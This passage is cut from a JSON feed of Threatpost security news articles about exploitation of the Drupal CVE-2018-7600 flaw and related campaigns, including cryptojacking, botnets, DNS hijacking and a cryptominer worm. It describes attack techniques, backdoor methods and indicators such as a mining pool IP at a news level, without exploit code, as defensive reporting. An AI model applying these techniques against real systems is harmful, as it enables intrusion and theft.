Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organizations are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately, this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. 
Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. 
As of June, in fact, more than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d a Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. 
This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. 
\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that they believe at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). 
Meanwhile, it uses popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition, Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201d said Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module. 
This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. 
I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-24T11:42:41", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 various countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars are being targeted in the U.S. 
and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. 
Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, as traditional security products aren\u2019t designed to monitor DNS requests, said researchers: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nAlternatively, the attackers gained access by exploiting known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for Cisco integrated service router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of impacted CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name system records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users into giving them their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes 
to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. 
\u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security is ordering all federal agencies to urgently audit DNS security for their domains in the next 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, Middle East and North Africa were linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. 
Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. 
They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-17T17:32:06", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2017-6736", "CVE-2018-7600", "CVE-2020-1938"], "modified": "2019-04-17T17:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. 
They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. 
It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader payload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file, meanwhile, is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. 
An init/update script accomplishes this on the Linux side, according to the analysis, by adding an authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. 
[Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. 
One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. 
\u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 and 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE-2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE-2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE-2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. 
For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE-2019-11510 | arbitrary file reading \nFortinet | CVE-2018-13379 | path traversal \nF5- Big IP | CVE-2020-5902 | remote code execution (RCE) \nMobileIron | CVE-2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE-2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. 
defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. 
The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. That raises the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Bar-Dayan said. 
\u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 